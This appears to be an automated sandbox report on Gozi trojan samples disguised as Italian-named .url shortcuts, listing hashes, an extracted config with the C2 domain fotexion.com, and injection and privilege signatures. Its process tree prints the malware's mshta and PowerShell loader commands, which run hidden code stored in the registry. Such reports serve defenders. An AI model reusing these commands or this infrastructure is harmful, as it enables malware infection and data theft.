Overview
overview
10Static
static
1url/Ammini...ne.url
windows10-1703-x64
10url/Ammini...ne.url
windows10-2004-x64
10url/Azienda.url
windows10-1703-x64
10url/Azienda.url
windows10-2004-x64
10url/Cliente.url
windows10-1703-x64
10url/Cliente.url
windows10-2004-x64
10url/Documenti.url
windows10-1703-x64
10url/Documenti.url
windows10-2004-x64
10url/Informazioni.url
windows10-1703-x64
10url/Informazioni.url
windows10-2004-x64
10url/dettagli.url
windows10-1703-x64
10url/dettagli.url
windows10-2004-x64
10url/inform.url
windows10-1703-x64
10url/inform.url
windows10-2004-x64
10url/modulo.url
windows10-1703-x64
10url/modulo.url
windows10-2004-x64
10url/processo.url
windows10-1703-x64
10url/processo.url
windows10-2004-x64
10url/sistema.url
windows10-1703-x64
10url/sistema.url
windows10-2004-x64
10Analysis
-
max time kernel
185s -
max time network
197s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
13-10-2023 01:40
Static task
static1
Behavioral task
behavioral1
Sample
url/Amministrazione.url
Resource
win10-20230915-en
Behavioral task
behavioral2
Sample
url/Amministrazione.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral3
Sample
url/Azienda.url
Resource
win10-20230915-en
Behavioral task
behavioral4
Sample
url/Azienda.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral5
Sample
url/Cliente.url
Resource
win10-20230915-en
Behavioral task
behavioral6
Sample
url/Cliente.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral7
Sample
url/Documenti.url
Resource
win10-20230915-en
Behavioral task
behavioral8
Sample
url/Documenti.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral9
Sample
url/Informazioni.url
Resource
win10-20230915-en
Behavioral task
behavioral10
Sample
url/Informazioni.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral11
Sample
url/dettagli.url
Resource
win10-20230831-en
Behavioral task
behavioral12
Sample
url/dettagli.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral13
Sample
url/inform.url
Resource
win10-20230915-en
Behavioral task
behavioral14
Sample
url/inform.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral15
Sample
url/modulo.url
Resource
win10-20230915-en
Behavioral task
behavioral16
Sample
url/modulo.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral17
Sample
url/processo.url
Resource
win10-20230915-en
Behavioral task
behavioral18
Sample
url/processo.url
Resource
win10v2004-20230915-en
Behavioral task
behavioral19
Sample
url/sistema.url
Resource
win10-20230915-en
General
-
Target
url/sistema.url
-
Size
206B
-
MD5
8d42f868af378fdaaf0fe40c29e52bbc
-
SHA1
1429d147f20ffed0505a47bea4a614deeda3e60c
-
SHA256
aeea621a727c1236ef86287c0733a97346621dfc74dbba858710a258449c0619
-
SHA512
aa296bd043daead87bdb2a2f895c8490635e87cbdacee4c11cd26e78913955a434506a449d91ddc90cb3b640e2d006fc04b18070cb5418d24080d4df842ef10a
Malware Config
Extracted
gozi
Extracted
gozi
5050
fotexion.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
fotexion.com
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 10 196 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 196 rundll32.exe -
Suspicious use of SetThreadContext 6 IoCs
Processes:
rundll32.execontrol.exeExplorer.EXEdescription pid process target process PID 196 set thread context of 2920 196 rundll32.exe control.exe PID 2920 set thread context of 3232 2920 control.exe Explorer.EXE PID 2920 set thread context of 4036 2920 control.exe rundll32.exe PID 3232 set thread context of 3804 3232 Explorer.EXE RuntimeBroker.exe PID 3232 set thread context of 1476 3232 Explorer.EXE WinMail.exe PID 3232 set thread context of 1016 3232 Explorer.EXE cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2713497151-363818805-1301026598-1000_Classes\Local Settings rundll32.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
rundll32.exepowershell.exeExplorer.EXEpid process 196 rundll32.exe 196 rundll32.exe 1120 powershell.exe 1120 powershell.exe 1120 powershell.exe 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 3232 Explorer.EXE -
Suspicious behavior: MapViewOfSection 6 IoCs
Processes:
rundll32.execontrol.exeExplorer.EXEpid process 196 rundll32.exe 2920 control.exe 2920 control.exe 3232 Explorer.EXE 3232 Explorer.EXE 3232 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 15 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 1120 powershell.exe Token: SeShutdownPrivilege 3232 Explorer.EXE Token: SeCreatePagefilePrivilege 3232 Explorer.EXE Token: SeShutdownPrivilege 3232 Explorer.EXE Token: SeCreatePagefilePrivilege 3232 Explorer.EXE Token: SeShutdownPrivilege 3232 Explorer.EXE Token: SeCreatePagefilePrivilege 3232 Explorer.EXE Token: SeShutdownPrivilege 3232 Explorer.EXE Token: SeCreatePagefilePrivilege 3232 Explorer.EXE Token: SeShutdownPrivilege 3232 Explorer.EXE Token: SeCreatePagefilePrivilege 3232 Explorer.EXE Token: SeShutdownPrivilege 3232 Explorer.EXE Token: SeCreatePagefilePrivilege 3232 Explorer.EXE Token: SeShutdownPrivilege 3232 Explorer.EXE Token: SeCreatePagefilePrivilege 3232 Explorer.EXE -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
rundll32.exepid process 2980 rundll32.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 3232 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
rundll32.execontrol.exerundll32.exemshta.exerundll32.execontrol.exeExplorer.EXEpowershell.execsc.execsc.exedescription pid process target process PID 2980 wrote to memory of 5048 2980 rundll32.exe control.exe PID 2980 wrote to memory of 5048 2980 rundll32.exe control.exe PID 5048 wrote to memory of 208 5048 control.exe rundll32.exe PID 5048 wrote to memory of 208 5048 control.exe rundll32.exe PID 208 wrote to memory of 196 208 rundll32.exe rundll32.exe PID 208 wrote to memory of 196 208 rundll32.exe rundll32.exe PID 208 wrote to memory of 196 208 rundll32.exe rundll32.exe PID 2136 wrote to memory of 1120 2136 mshta.exe powershell.exe PID 2136 wrote to memory of 1120 2136 mshta.exe powershell.exe PID 196 wrote to memory of 2920 196 rundll32.exe control.exe PID 196 wrote to memory of 2920 196 rundll32.exe control.exe PID 196 wrote to memory of 2920 196 rundll32.exe control.exe PID 196 wrote to memory of 2920 196 rundll32.exe control.exe PID 196 wrote to memory of 2920 196 rundll32.exe control.exe PID 2920 wrote to memory of 3232 2920 control.exe Explorer.EXE PID 2920 wrote to memory of 3232 2920 control.exe Explorer.EXE PID 2920 wrote to memory of 3232 2920 control.exe Explorer.EXE PID 2920 wrote to memory of 3232 2920 control.exe Explorer.EXE PID 2920 wrote to memory of 4036 2920 control.exe rundll32.exe PID 2920 wrote to memory of 4036 2920 control.exe rundll32.exe PID 2920 wrote to memory of 4036 2920 control.exe rundll32.exe PID 3232 wrote to memory of 3804 3232 Explorer.EXE RuntimeBroker.exe PID 3232 wrote to memory of 3804 3232 Explorer.EXE RuntimeBroker.exe PID 2920 wrote to memory of 4036 2920 control.exe rundll32.exe PID 3232 wrote to memory of 3804 3232 Explorer.EXE RuntimeBroker.exe PID 2920 wrote to memory of 4036 2920 control.exe rundll32.exe PID 3232 wrote to memory of 3804 3232 Explorer.EXE RuntimeBroker.exe PID 3232 wrote to memory of 1476 3232 Explorer.EXE WinMail.exe PID 3232 wrote to memory of 1476 3232 Explorer.EXE WinMail.exe PID 3232 wrote to memory of 1476 3232 Explorer.EXE WinMail.exe PID 3232 wrote to memory of 1476 3232 Explorer.EXE WinMail.exe PID 3232 wrote to memory of 1476 3232 Explorer.EXE WinMail.exe PID 1120 wrote to memory of 3152 1120 powershell.exe csc.exe PID 1120 wrote to memory of 3152 1120 powershell.exe csc.exe PID 3232 wrote to memory of 1016 3232 Explorer.EXE cmd.exe PID 3232 wrote to memory of 1016 3232 Explorer.EXE cmd.exe PID 3232 wrote to memory of 1016 3232 Explorer.EXE cmd.exe PID 3232 wrote to memory of 1016 3232 Explorer.EXE cmd.exe PID 3232 wrote to memory of 1016 3232 Explorer.EXE cmd.exe PID 3232 wrote to memory of 1016 3232 Explorer.EXE cmd.exe PID 3152 wrote to memory of 4904 3152 csc.exe cvtres.exe PID 3152 wrote to memory of 4904 3152 csc.exe cvtres.exe PID 1120 wrote to memory of 632 1120 powershell.exe csc.exe PID 1120 wrote to memory of 632 1120 powershell.exe csc.exe PID 632 wrote to memory of 852 632 csc.exe cvtres.exe PID 632 wrote to memory of 852 632 csc.exe cvtres.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3232 -
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\url\sistema.url2⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\System32\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DXFPCU0G\sistema[1].cpl",3⤵
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DXFPCU0G\sistema[1].cpl",4⤵
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\DXFPCU0G\sistema[1].cpl",5⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:196 -
C:\Windows\system32\control.exeC:\Windows\system32\control.exe -h6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h7⤵PID:4036
-
-
-
-
-
-
-
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Vuxk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Vuxk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\7AF14A9C-91D2-BC6A-EB4E-55B04F6259E4\\\MaskStop'));if(!window.flag)close()</script>"2⤵
- Suspicious use of WriteProcessMemory
PID:2136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name qnggdlql -value gp; new-alias -name qqtdpyu -value iex; qqtdpyu ([System.Text.Encoding]::ASCII.GetString((qnggdlql "HKCU:Software\AppDataLow\Software\Microsoft\7AF14A9C-91D2-BC6A-EB4E-55B04F6259E4").AboutText))3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h24qrlng\h24qrlng.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3152 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES54D8.tmp" "c:\Users\Admin\AppData\Local\Temp\h24qrlng\CSCC69E8AEA4B384E9B9AA914BAAC724E89.TMP"5⤵PID:4904
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ao3wnyw4\ao3wnyw4.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:632 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6488.tmp" "c:\Users\Admin\AppData\Local\Temp\ao3wnyw4\CSC870724895493413A9B4068D958A587C1.TMP"5⤵PID:852
-
-
-
-
-
C:\Program Files\Windows Mail\WinMail.exe"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE2⤵PID:1476
-
-
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:1016
-
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3804
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3
-
Filesize
1KB
MD53255193caa0e9ff3a9340fcd03425862
SHA1b260b00b4c4ed0ebea65633671b97106fbc59529
SHA256512ee31b92a5717356dc03a82079a9f3542ba51cb5ed15d6a6c0928f710bf114
SHA5125b8dff95e0c8d8e9828f908a5fc57214a4a561f7dc653185c1a254031207be0a1cc54e94174bce3f20bf01aa7b9aa582483cc085dace878d297d79a146097d00
-
Filesize
1KB
MD5c8d98f7c3eb9cb834048d7e5a497216c
SHA143fef480f6a37b061c3b6e5f23d7289d6c25c2a1
SHA256bd1a72b563096143f7ea1de3b25a61cffbd9c199894ad2c7ebd45888fe025ffd
SHA512b3eea0eaa24c09434aacc7cd70f75217429f20d69f55dd4a6b4855344d8be6521c632585c83347d5d27e9f3d02fd40d2c122267b294ba591f7ccb94081ab0256
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3KB
MD526d26714ab5c2d1f9cb24a21daaf780b
SHA165ab3a8d0b9804b22945d82c6bac5ee7a329a0ed
SHA256eebbfce05171c490e6573722c95714049c2abb801e0d0d70d2150aef7c1b2e76
SHA512b70a6f849b9c1a84ba6012b964b7b1a23c9f7c073d6438565f4f0ceff93d605916db1232e79bb45df861fec4c1b7cc1aef0db656cde4ec442e2a362c95d951e1
-
Filesize
3KB
MD5de312e7a223542388068fce99b1ff9a8
SHA1569cc71c507a830e19de84a03c8340586cf94505
SHA25682f1854a14221c8f4a8d993e572013bf28240785dc1bb50918030fc961628ac6
SHA512baaec3e4dbd8a3cf56a5b73ac7a6ef56eecefbb28982d8b3f2c7d5c71f6cd1778d292693595aa423e0309610ca4dd9510c43b867342a787c275e4f62b2965b90
-
Filesize
652B
MD54e625ebde4e951fa159e0fa8ddafe21f
SHA159072a3f60fbbe23733f0dcb9be54144a87a0e9b
SHA256651226638c3e20f31bb6b34e6505807c67345bf077e9c1e8da51600d47b46577
SHA512bb4d691dbb495f1e4b544055c8ec46c3564f48f0d1f886e0c02de7a2e31d18d8b39897e8cc57c05119c159117edd25bbdbaae52bb91a949a9be62a3f34be5079
-
Filesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
Filesize
369B
MD5559a958225f500ab1fedddf6d1366b77
SHA14e06b2ab106bafe90a0ae29d05c903a8b776ac8b
SHA25630e15dae7d4905d40b00296078fb07ab38ba4630ba0db396842704c2360ffc9e
SHA51211b1208c6120118b1f608f26e49372bc83bcfa61b18d9714c15eb4ecdc1b4717673165e1dd03fd8dd2f07efb39c43ff5fe6bf11998cd4bd9999fe4925eb38d1b
-
Filesize
652B
MD588a29e86e1cbc4e797f0ed95aca276f0
SHA198aec487c7bb06a32419e6aeaacdf00d769dc4dc
SHA256b254130dee92c6a3cc57b498e995b79b6017eafa30e5cec7a6a6ad3df9e5819b
SHA512dddff1adc061033857529a45239430eed41969377a7fcfee86c1947c8630e61866c1688f2aafb7445f87331eaecfb7f1a6c1636efe882a8a21aeb202d5ebcb71
-
Filesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
Filesize
369B
MD52f649c188aac320dba0e978b34095d8c
SHA1c2a07b3e57a52d4f668a40c4fb31e078c8ad5674
SHA256783aa5ea280cc16d945ce6bde2171df2686b2193e2b15905a1835800654397f2
SHA512a55fc5e096f0cc1dbd5f8fe0557ac594e4f4929507356099a853a307a20ac59be699cb4ca971d9e9243f7d0b35661fe491a5b943cffb2de2580e6fb1af4aa85c
-
Filesize
206KB
MD572e2a5c797954e895a41be5b20f867b2
SHA1419aacfb3ccea9b08277bcc9405054fa4238a597
SHA256858d867cc62c0bf13b16ccdb9f6cd6022d61fc2ab98a7db60806a35c7da9b2e0
SHA51277be53cf579f69ee728fafbe93568b8d4c462490ba3fe053db367798508abb0d7a838731d17e465f0a29b982eb49e1227d94c971823e1d375b2b761887e107b3